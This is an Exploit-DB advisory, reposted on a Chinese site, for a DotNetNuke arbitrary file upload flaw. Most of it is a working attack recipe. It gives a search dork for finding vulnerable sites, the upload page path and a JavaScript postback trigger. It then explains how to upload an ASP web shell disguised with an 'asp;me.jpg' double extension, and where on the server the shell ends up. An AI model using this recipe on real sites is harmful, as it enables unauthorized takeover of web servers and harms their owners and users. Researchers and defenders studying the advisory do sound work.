DotNetNuke – Arbitrary File Upload - 体验盒子

作者： Ra3cH & Ma3sTr0-Dz

日期： 2010-05-22

类别：

webapps

平台：

asp

来源：https://www.exploit-db.com/exploits/12700/

************************************************************
**DotNetNuke Remote File upload Vulnerability 
************************************************************
**Prodcut:DotNetNuke 
**Home : www.DZ4All.cOm/Cc
**Vunlerability :Remote File upload
**Risk:High
**Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors :Ra3cH & Ma3sTr0-Dz
** From:Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH 
** All Members ofhttp://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
**Exploit:
**http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
**AnD Add :javascript:__doPostBack('ctlURL$cmdUpload','')
**
** 
**AnD UpLOaD YoUr ShEll AsP LiKeDz4aLL.asp;me.jpg
************************************************************
**
**you find your Shell Hier 
**
**http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************